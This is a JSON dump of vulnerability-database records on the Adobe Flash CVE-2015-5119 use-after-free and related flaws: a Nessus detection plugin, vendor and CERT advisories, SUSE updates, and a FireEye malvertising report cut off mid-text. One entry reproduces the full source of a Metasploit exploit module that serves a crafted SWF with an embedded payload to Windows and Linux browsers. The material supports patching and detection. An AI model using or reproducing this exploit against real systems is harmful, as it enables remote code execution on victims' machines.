KB3065823.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# <= 18.0.0.194\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 18 ||\n (\n iver[0] == 18 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] <= 194)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 18.0.0.203' +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:44:23", "description": "The version of Google Chrome OS on the remote mobile host is prior to 43.0.2357.132 and thus unpatched for the following vulnerabilities :\n\n - A use-after-free error exists in the opaqueBackground class in the ActionScript 3 (AS3) implementation. A remote attacker, via specially crafted Flash content, can dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2015-5122) \n - A use-after-free error exists in the BitmapData class in the ActionScript 3 (AS3) implementation. A remote attacker, via specially crafted Flash content, can dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2015-5123) \n - A flaw exists due to user-supplied input not being properly validated. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. (CVE-2015-5124) \n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097) \n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118) \n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431) \n - Multiple NULL pointer dereference flaws exist. (CVE-2015-3126, CVE-2015-4429) \n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114) \n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433) \n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119) \n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116) \n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-25T00:00:00", "type": "nessus", "title": "Google Chrome OS < 43.0.2357.132 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5122", "CVE-2015-5123", "CVE-2015-5124", "CVE-2015-3097"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:o:google:chrome_os:*:*:*:*:*:*:*:*"], "id": "8886.PRM", "href": "https://www.tenable.com/plugins/nnm/8886", "sourceData": "Binary data 8886.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:47:01", "description": "A vulnerability exists within Adobe Flash Player ActionScript 3 ByteArray class. A successful exploitation can allow a remote attacker to execute arbitrary code on a vulnerable system.", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash ActionScript 3 ByteArray Use After Free (APSA15-03: CVE-2015-5119)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-10-14T00:00:00", "id": "CPAI-2015-0806", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:49:18", "description": "Use-after-free vulnerability in the ByteArray class in the ActionScript 3\n(AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x\nthrough 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on\nLinux allows remote attackers to execute arbitrary code or cause a denial\nof service (memory corruption) via crafted Flash content that overrides a\nvalueOf function, as exploited in the wild in July 2015.", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "ubuntucve", "title": "CVE-2015-5119", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "UB:CVE-2015-5119", "href": "https://ubuntu.com/security/CVE-2015-5119", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-09-28T17:52:18", "description": "### Overview\n\nAdobe Flash Player contains a vulnerability in the ActionScript 3 ByteArray class, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nAdobe Flash Player versions 9.0 through version 18.0.0.194 contain a use-after-free vulnerability in the [AS3 ByteArray class](<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html>). This can allow attacker-controlled memory corruption. Exploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact\n\nAn attacker can execute arbitrary code in the context of the user running Flash Player. Attacks typically involve enticing a user to visit a web site containing specially-crafted Flash content, or to open a specially-crafted Microsoft Office document. \n \n--- \n \n### Solution\n\n**Apply an update**\n\nThis issue is addressed in Flash Player Desktop 18.0.0.203. Please see [Adobe Security Bulletin APSB15-16](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>) for more details and fix versions for other platforms. \n \n--- \n \n**Do not run untrusted Flash content** \n \nTo defend against this and other, as yet unknown vulnerabilities, disable Flash in your browser or enable [Click-to-Play](<http://www.howtogeek.com/188059/how-to-enable-click-to-play-plugins-in-every-web-browser>) features. Adobe has also provided instructions for how to [uninstall Flash on Windows](<https://helpx.adobe.com/flash-player/kb/uninstall-flash-player-windows.html>) and [Mac](<https://helpx.adobe.com/flash-player/kb/uninstall-flash-player-mac-os.html>) platforms. \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://www.microsoft.com/emet>) (EMET) can be used to help prevent exploitation of this vulnerability. In particular, Attack Surface Reduction (ASR) can be configured to help restrict Microsoft Office and Internet Explorer from loading the Flash ActiveX control. \n \n--- \n \n### Vendor Information\n\n561288\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Adobe Affected\n\nNotified: July 06, 2015 Updated: July 08, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 7.1 | E:H/RL:W/RC:C \nEnvironmental | 7.1 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>\n * <https://helpx.adobe.com/security/products/flash-player/apsa15-03.html>\n * <https://twitter.com/w3bd3vil/status/618168863708962816>\n * <http://malware.dontneedcoffee.com/2015/07/hackingteam-flash-0d-cve-2015-xxxx-and.html>\n * <http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html>\n * <http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/>\n * <http://www.microsoft.com/emet>\n\n### Acknowledgements\n\nThis vulnerability was discovered by HackingTeam.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-5119](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-5119>) \n---|--- \n**Date Public:** | 2015-07-05 \n**Date First Published:** | 2015-07-07 \n**Date Last Updated: ** | 2015-07-11 18:39 UTC \n**Document Revision: ** | 38 \n", "cvss3": {}, "published": "2015-07-07T00:00:00", "type": "cert", "title": "Adobe Flash ActionScript 3 ByteArray use-after-free vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-11T18:39:00", "id": "VU:561288", "href": "https://www.kb.cert.org/vuls/id/561288", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:13:40", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5119: Unspecified vulnerability allowing remote attackers to\n take over the system (bsc#937339).\n\n", "cvss3": {}, "published": "2015-07-08T17:08:40", "type": "suse", "title": "Security update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T17:08:40", "id": "OPENSUSE-SU-2015:1207-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00015.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:02:17", "description": "flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n - CVE-2015-5119: Unspecified vulnerability allowing remote attackers to\n take over the system (bsc#937339).\n\n", "cvss3": {}, "published": "2015-07-08T22:07:55", "type": "suse", "title": "Security update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T22:07:55", "id": "OPENSUSE-SU-2015:1210-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00016.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:05:46", "description": "flash-player was updated to fix 35 security issues.\n\n These security issues were fixed:\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow\n vulnerabilities that could lead to code execution (bsc#937339).\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that\n could lead to code execution (bsc#937339).\n - CVE-2015-3126, CVE-2015-4429: Null pointer dereference issues\n (bsc#937339).\n - CVE-2015-3114: A security bypass vulnerability that could lead to\n information disclosure (bsc#937339).\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122,\n CVE-2015-4433: Type confusion vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116: Vulnerabilities that could be exploited to bypass the\n same-origin-policy and lead to information disclosure (bsc#937339).\n\n", "cvss3": {}, "published": "2015-07-09T11:08:12", "type": "suse", "title": "Security update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2015-07-09T11:08:12", "id": "SUSE-SU-2015:1211-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00017.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:28:41", "description": "flash-player was updated to fix 35 security issues.\n\n These security issues were fixed:\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow\n vulnerabilities that could lead to code execution (bsc#937339).\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that\n could lead to code execution (bsc#937339).\n - CVE-2015-3126, CVE-2015-4429: Null pointer dereference issues\n (bsc#937339).\n - CVE-2015-3114: A security bypass vulnerability that could lead to\n information disclosure (bsc#937339).\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122,\n CVE-2015-4433: Type confusion vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could lead to code\n execution (bsc#937339).\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116: Vulnerabilities that could be exploited to bypass the\n same-origin-policy and lead to information disclosure (bsc#937339).\n\n", "cvss3": {}, "published": "2015-07-09T14:08:22", "type": "suse", "title": "Security update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2015-07-09T14:08:22", "id": "SUSE-SU-2015:1214-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00018.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-05T03:19:42", "description": "This Metasploit module exploits a use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as a Use After Free while handling ByteArray objects. This Metasploit module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "zdt", "title": "Adobe Flash Player ByteArray Use After Free Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "1337DAY-ID-23842", "href": "https://0day.today/exploit/description/23842", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ByteArray Use After Free',\r\n 'Description' => %q{\r\n This module exploits an use after free on Adobe Flash Player. The vulnerability,\r\n discovered by Hacking Team and made public on its July 2015 data leak, was\r\n described as an Use After Free while handling ByteArray objects. This module has\r\n been tested successfully on:\r\n\r\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\r\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\r\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,\r\n Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and\r\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Someone from HackingTeam\r\n 'juan vazquez', # msf module\r\n 'sinn3r' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-5119'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],\r\n ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81 ||\r\n os =~ OperatingSystems::Match::WINDOWS_VISTA ||\r\n os =~ OperatingSystems::Match::WINDOWS_XP\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n :flash => lambda do |ver|\r\n case target.name\r\n when 'Windows'\r\n # Note: Chrome might be vague about the version.\r\n # Instead of 18.0.0.203, it just says 18.0\r\n return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jul 06 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n\r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/23842", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2017-03-07T16:24:18", "description": "\n\nThreat Overview\n\nThe online advertisements that people see across a wide range of popular and lesser-known websites can lead to malware infections and other forms of compromise, sometimes without any user interaction whatsoever and without any indicators there is an issue.\n\nThis emerging threat is known as malvertising (a portmanteau of \u2018malicious\u2019 and \u2018advertising\u2019), and FireEye Labs recently uncovered an ongoing campaign involving online advertising network onclickads[.]net, a domain with an Alexa global rank of 39 and 113 in the United States. Onclickads[.]net is operated by Propeller Ads Media, an online advertising exchange.\n\nIn this case, websites serving ad content from onclickads[.]net could infect visitors by first redirecting them to the Rig Exploit Kit. An exploit kit is essentially a toolkit that automatically targets specified software vulnerabilities \u2013 primarily to distribute malware.\n\nThe FireEye Dynamic Threat Intelligence (DTI) first detected the malvertising activity on Oct. 6, 2015, and the campaign is still active today. Those redirected to the Rig Exploit Kit landing page could be compromised via exploits targeting Adobe Flash, Internet Explorer, Java and Microsoft Silverlight.\n\nFor the everyday Internet user, the threat would play out like this: The user navigates to a website; the website serves a malicious advertisement from onclickads[.]net; the user is redirected to the Rig Exploit Kit landing page and one of several vulnerabilities is targeted.\n\nFor this particular campaign, a completely successful attack results in the user becoming infected with malware.\n\nTechnical Details\n\nDTI detected Rig Exploit Kit URLs on a daily basis and each URL had a similar HTTP Referer header field belonging to onclickads[.]net, as shown in Figure 1.\n\n\n\nFigure 1. Example onclickads[.]net referers seen redirecting to Rig Exploit Kit\n\nMalvertising attacks can be difficult to identify, but in this case, as shown in Figure 2, it starts with a normal looking ad content HTTP GET request made when visiting a site that serves ad content from onclickads[.]net.\n\n\n\nFigure 2. GET request to onclickads[.]net\n\nLooking a little closer, we see that the URL contains strings that slightly resemble those used by OpenX/Revive ad servers, one the most popular ad software systems on the market.\n\nCommonly seen, legitimate OpenX/Revive URLs might look something like this:\n\n/www/delivery/afr.php?zoneid=8&amp;cb=1925363925374\n\nWe checked out a copy of the OpenX repository to review the contents. While the repository contains a legitimate file named afr.php, there was no file named afu.php as shown in the GET request from Figure 2.\n\nAlthough ad servers are often abused by malvertisers, OpenX systems and their associated URLs are normally not an indication of malicious activity, just advertising activity; so it\u2019s common to see them mixed in with other HTTP traffic in most network environments. You can see how the malicious traffic associated with this malvertising campaign might slip by with other OpenX advertising traffic since it closely resembles that of a legitimate ad system.\n\nOnclickads[.]net appears to have previously been involved in malvertising activity. The online advertising 